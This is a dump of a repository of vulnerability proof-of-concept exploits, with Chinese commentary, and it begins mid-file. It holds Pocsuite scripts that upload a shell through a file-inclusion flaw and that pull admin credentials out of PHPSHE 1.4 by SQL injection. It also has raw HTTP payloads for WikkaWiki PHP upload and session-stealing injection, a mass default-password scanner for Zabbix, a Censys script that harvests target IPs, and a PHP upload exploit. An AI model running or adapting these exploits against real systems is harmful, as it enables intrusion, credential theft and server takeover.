form-data; 
name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n" 48 | # 上传shell 49 | post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=') 50 | resp = req.post(url=post_url,data=post_data) 51 | 52 | # 从返回的内容中提取上传图片的文件名 53 | if resp.status_code == 200: 54 | match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M) 55 | if match_result: 56 | # 访问本地文件包含地址 57 | payload = "../../uploadfiles/" + match_result.group(1) + "%00" 58 | vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload) 59 | resp = req.get(vul_url) 60 | if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content: 61 | result['ShellInfo'] = {} 62 | result['ShellInfo']['URL'] = vul_url 63 | result['ShellInfo']['Content'] = "" 64 | return self.parse_attack(result) 65 | 66 | return self._verify() 67 | 68 | def _verify(self): 69 | if self.check_argv(): 70 | result = {} 71 | 72 | # 设置header里的Content-Type,表明需要上传文件 73 | self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz" 74 | # 文件名为testjpg.jpg,内容为 75 | post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; 
name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n" 76 | # 上传地址,这个是正常功能 77 | post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=') 78 | resp = req.post(url=post_url,data=post_data) 79 | 80 | # 从返回的内容中提取上传图片的文件名 81 | if resp.status_code == 200: 82 | match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M) 83 | if match_result: 84 | # 访问本地文件包含地址 85 | payload = "../../uploadfiles/" + match_result.group(1) + "%00" 86 | vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload) 87 | resp = req.get(vul_url) 88 | if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content: 89 | result['VerifyInfo'] = {} 90 | result['VerifyInfo']['URL'] = vul_url 91 | return self.parse_attack(result) 92 | 93 | def parse_output(self, result): 94 | #parse output 95 | output = Output(self) 96 | if result: 97 | output.success(result) 98 | else: 99 | output.fail('Internet nothing returned') 100 | return output 101 | 102 | 103 | register(TestPOC) -------------------------------------------------------------------------------- /WikkaWiki 1.3.2 Spam Logging PHP Injection/README.md: -------------------------------------------------------------------------------- 1 | # WikkaWiki 1.3.2 Spam Logging PHP Injection 2 | --- 3 | 先来看下位于 /actions/files/files.php 的这段代码 4 | 5 | ``` 6 | 266. elseif (preg_match('/.+\.('.$allowed_extensions.')$/i', $_FILES['file']['name'])) 7 | 267. { 8 | 268. $strippedname = str_replace('\'', '', $_FILES['file']['name']); 9 | 269. $strippedname = rawurlencode($strippedname); 10 | 270. $strippedname = stripslashes($strippedname); 11 | 271. $destfile = $upload_path.DIRECTORY_SEPARATOR.$strippedname; 12 | 272. } 13 | 273. if (!file_exists($destfile)) 14 | 274. { 15 | 275. if (move_uploaded_file($_FILES['file']['tmp_name'], $destfile)) 16 | 276. { 17 | 277. 
$notification_msg = T_("File was successfully uploaded."); 18 | 278. } 19 | ... 20 | ``` 21 | 22 | 在"INTRANET_MODE"开启,或者攻击者利用CVE-2011-4448漏洞成功实施会话劫持攻击的情况下,攻击者可以上传包含多个扩展名的文件。 23 | 24 | 代码第266行的$allowed_extensions定义如下: 25 | 26 | ``` 27 | gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|asc|txt|zip|gtar|g 28 | z|bz2|tar|rar|vpp|mpp|vsd|mm|htm|htm 29 | ``` 30 | 31 | 像mm、vpp这样的扩展名在Apache的mime.types中是非常少见的。 32 | 33 | 在Apache 1.x、2.x中,Apache对文件名后缀是从后往前解析的,直到遇到一个Apache认识的文件类型为止。 34 | 35 | 所以上传一个test.php.mm,Apache会从后往前遍历后缀,直到.php,然后认为它是一个php类型的文件。 36 | 37 | 现在来看攻击过程 38 | 39 | 假设test这个页面是包含了files.php的,构造以下请求 40 | 41 | ``` 42 | POST /wikka/test HTTP/1.1 43 | Host: localhost 44 | Cookie: 96522b217a86eca82f6d72ef88c4c7f4=upjhsdd5rtc0ib55gv36l0jdt3 45 | Content-Length: 251 46 | Content-Type: multipart/form-data; boundary=--------1503534127 47 | Connection: keep-alive 48 | 49 | ----------1503534127 50 | Content-Disposition: form-data; name="file"; filename="test.php.mm" 51 | Content-Type: application/octet-stream 52 | 53 | 54 | ----------1503534127 55 | Content-Disposition: form-data; name="upload" 56 | 57 | Upload 58 | ----------1503534127-- 59 | ``` -------------------------------------------------------------------------------- /WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities/README.md: -------------------------------------------------------------------------------- 1 | # WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities 2 | --- 3 | /actions/usersettings/usersettings.php代码中存在此漏洞 4 | 5 | ``` 6 | 141. $this->Query(" 7 | 142. UPDATE ".$this->GetConfigValue('table_prefix')."users 8 | 143. SET email = '".mysql_real_escape_string($email)."', 9 | 144. doubleclickedit = '".mysql_real_escape_string($doubleclickedit)."', 10 | 145. show_comments = '".mysql_real_escape_string($show_comments)."', 11 | 146. default_comment_display = '".$default_comment_display."', 12 | 147. revisioncount = ".$revisioncount.", 13 | 148. changescount = ".$changescount.", 14 | 149. 
theme = '".mysql_real_escape_string($usertheme)."' 15 | 150. WHERE name = '".$user['name']."' 16 | 151. LIMIT 1" 17 | 152. ); 18 | ``` 19 | 20 | 在进行update操作的时候,$default_comment_display是唯一一个没有用mysql_real_escape_string()处理过的参数 21 | 22 | 可以构造语句获取admin的会话记录用于会话劫持,构造以下请求 23 | 24 | ``` 25 | POST /wikka/UserSettings HTTP/1.1 26 | Host: localhost 27 | Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6 28 | Content-Length: 140 29 | Content-Type: application/x-www-form-urlencoded 30 | Connection: keep-alive 31 | 32 | action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme=' 33 | ``` 34 | 35 | 如果admin已经登录或者会话仍未过期,就可获得admin的会话记录 -------------------------------------------------------------------------------- /Zabbix弱口令/Zabbix.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | # zabbix弱口令 5 | 6 | import requests 7 | import threading 8 | from Queue import Queue 9 | 10 | url_queue = Queue() 11 | vul_queue = Queue() 12 | THREAD_NUM = 20 13 | vul_url_txt = open("zabbix_vul_ip.txt","w") 14 | users = { 15 | "Admin":"zabbix", 16 | "test":"test" 17 | } 18 | 19 | class Zabbix: 20 | def __init__(self): 21 | self.headers = { 22 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36", 23 | "Content-Type":"application/x-www-form-urlencoded" 24 | } 25 | 26 | def set_ip(self,ip): 27 | self.ip = ip 28 | 29 | def check(self): 30 | global users 31 | urls = ["http://" + self.ip + "/index.php","http://" + self.ip + "/zabbix/index.php"] 32 | for url in urls: 33 | for (username,password) in users.items(): 34 | data = "request=&name=" + username + "&password=" + password + "&autologin=1&enter=Sign+in" 35 | # print data 36 | try: 37 | response = requests.post(url = url,data = data,headers = self.headers,timeout = 10) 38 | if 
response.status_code == 200 and "Admin" in response.content: 39 | return True 40 | # pass 41 | # print "=====================" 42 | # print response.text.find("Admin") 43 | except Exception,e: 44 | # print e 45 | pass 46 | return False 47 | 48 | class testTarget(threading.Thread): 49 | def __init__(self): 50 | threading.Thread.__init__(self) 51 | 52 | def run(self): 53 | global url_queue 54 | global THREAD_NUM 55 | zabbix = Zabbix() 56 | while not url_queue.empty(): 57 | ip = url_queue.get() 58 | print "Checing " + ip 59 | zabbix.set_ip(ip) 60 | if zabbix.check(): 61 | vul_queue.put(ip) 62 | 63 | def test(): 64 | threads = [] 65 | for i in range(THREAD_NUM): 66 | t = testTarget() 67 | t.start() 68 | threads.append(t) 69 | for t in threads: 70 | t.join() 71 | 72 | if __name__ == '__main__': 73 | ip_text = open("zabbix_ip.txt","r") 74 | for line in ip_text: 75 | url_queue.put(line.strip("\n")) 76 | ip_text.close() 77 | test() 78 | while not vul_queue.empty(): 79 | vul_url_txt.write(vul_queue.get() + "\n") 80 | 81 | vul_url_txt.close() 82 | -------------------------------------------------------------------------------- /censys_query.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | from Queue import Queue 4 | import threading 5 | import sys 6 | import time 7 | 8 | API_URL = "https://www.censys.io/api/v1" 9 | UID = "" 10 | SECRET = "" 11 | PAGES = 28 12 | cur_page = 1 13 | 14 | vul_ip = open("test_ip.txt","w") 15 | 16 | def get_ip(query,page): 17 | data = { 18 | "query":query, 19 | "page":page, 20 | "fields":["ip"] 21 | } 22 | 23 | try: 24 | res = requests.post(API_URL + "/search/ipv4",data=json.dumps(data),auth=(UID,SECRET)) 25 | results = res.json() 26 | if res.status_code != 200: 27 | print "Error : %s" % results["error"] 28 | sys.exit(1) 29 | else: 30 | result_iter = iter(results["results"]) 31 | for result in result_iter: 32 | vul_ip.write(result["ip"] + "\n") 33 | except Exception,e: 34 | 
print e 35 | 36 | 37 | if __name__ == "__main__": 38 | if len(sys.argv) != 2: 39 | print """ 40 | Usage: 41 | python censys_query.py query_str 42 | """ 43 | sys.exit() 44 | else: 45 | query = sys.argv[1] 46 | 47 | while cur_page <= PAGES: 48 | print "Page" + str(cur_page) 49 | get_ip(query,cur_page) 50 | cur_page += 1 51 | time.sleep(1) 52 | vul_ip.close() -------------------------------------------------------------------------------- /eYou老版本Cookie命令执行/README.md: -------------------------------------------------------------------------------- 1 | ## 亿邮某些老版本通杀型漏洞 2 | --- 3 | 针对旧版本eYou的cookie任意命令执行,此POC不再维护 -------------------------------------------------------------------------------- /eYou老版本Cookie命令执行/eYouExp.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /phpoa4.0 任意文件上传/README.md: -------------------------------------------------------------------------------- 1 | #### PHPOA4.0通杀上传漏洞 2 | --- 3 | WooYun:http://www.wooyun.org/bugs/wooyun-2015-0163072 4 | 5 | 在提交漏洞的时候少测试了是否要登录这一步,提交确认后却发现原来不用登录直接上传一句话即可,页面返回的json里有地址 6 | 7 | 复习周中,找个时间再写脚本 8 | 9 |
-------------------------------------------------------------------------------- /phpshe1.4 sql injection/README.md: -------------------------------------------------------------------------------- 1 | ##PHPSHE 1.4 /www/module/user/order.php注入 2 | --- 3 | 暂无详情,请移步POC -------------------------------------------------------------------------------- /phpshe1.4 sql injection/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | 4 | from pocsuite.lib.core.poc import Output, POCBase 5 | from pocsuite.lib.core.register import registerPoc as register 6 | from pocsuite.lib.request.basic import req 7 | from pocsuite.lib.core.data import logger 8 | from pocsuite.lib.core.enums import CUSTOM_LOGGING 9 | import urlparse 10 | import re 11 | 12 | class TestPOC(POCBase): 13 | vulID = '' # ssvid 14 | version = '1.0' 15 | author = ['Gump'] 16 | vulDate = '' 17 | createDate = '2016-01-24' 18 | updateDate = '2016-01-24' 19 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0141457'] 20 | name = 'PHPSHE 1.4 /www/module/user/order.php SQL注入 POC' 21 | appPowerLink = 'http://www.phpshe.com/' 22 | appName = 'PHPSHE' 23 | appVersion = '1.4' 24 | vulType = 'SQL injection' 25 | desc = ''' 26 | PHPSHE 1.4 在/www/module/user/order.php中对参数过滤不严导致SQL注入 27 | ''' 28 | 29 | def check_argv(self): 30 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要登录后的cookie") 31 | if self.headers['Cookie']: 32 | logger.log(CUSTOM_LOGGING.WARNING,u"请确保cookie正确") 33 | return True 34 | else: 35 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie") 36 | return False 37 | 38 | def _attack(self): 39 | if self.check_argv(): 40 | result = {} 41 | payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(char(45,45,45),admin_name,char(45,45,45),admin_pw,char(45,45,45))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" 42 | vulurl = urlparse.urljoin(self.url,'user.php' + 
payload) 43 | resp = req.get(vulurl) 44 | if resp.status_code == 200: 45 | match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M) 46 | if match_result: 47 | result['AdminInfo'] = {} 48 | result['AdminInfo']['Username'] = match_result.group(1) 49 | result['AdminInfo']['Password'] = match_result.group(2) 50 | return self.parse_attack(result) 51 | 52 | def _verify(self): 53 | if self.check_argv(): 54 | result = {} 55 | payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(floor(rand(0)*2),md5(1))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" 56 | vulurl = urlparse.urljoin(self.url,'user.php' + payload) 57 | resp = req.get(vulurl) 58 | if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 59 | result['VerifyInfo'] = {} 60 | result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'user.php') 61 | result['VerifyInfo']['Payload'] = payload 62 | return self.parse_attack(result) 63 | 64 | def parse_attack(self,result): 65 | output = Output(self) 66 | if result: 67 | output.success(result) 68 | else: 69 | output.fail('Nothon returned') 70 | return output 71 | 72 | register(TestPOC) 73 | -------------------------------------------------------------------------------- /新中新校园卡任意文件上传/README.md: -------------------------------------------------------------------------------- 1 | ##新中新电子卡系统通杀型漏洞 2 | --- 3 | 测试年代有点久远,学校校园卡查询系统服务器也已经关闭,不再维护该POC -------------------------------------------------------------------------------- /新中新校园卡任意文件上传/poc.php: -------------------------------------------------------------------------------- 1 | "@D:\\123.jsp" 8 | 9 | ); 10 | 11 | $ch=curl_init(); 12 | 13 | curl_setopt($ch, CURLOPT_URL, $url); 14 | 15 | curl_setopt($ch, CURLOPT_HEADER, false); 16 | 17 | curl_setopt($ch,CURLOPT_BINARYTRANSFER,true); 18 | 19 | curl_setopt($ch, CURLOPT_POST, 1); 20 | 21 | @curl_setopt($ch, CURLOPT_POSTFIELDS, $file); 22 | 23 | 
curl_setopt($ch, CURLOPT_HEADER, 1); 24 | 25 | curl_setopt($ch, CURLOPT_NOBODY, 0); 26 | 27 | curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 28 | 29 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); 30 | 31 | $content=curl_exec($ch); 32 | 33 | $rinfo=curl_getinfo($ch); 34 | 35 | @$content=iconv("GB2312","UTF-8",htmlentities($content,ENT_COMPAT,'GB2312')); 36 | 37 | echo $content."


"; 38 | ?> --------------------------------------------------------------------------------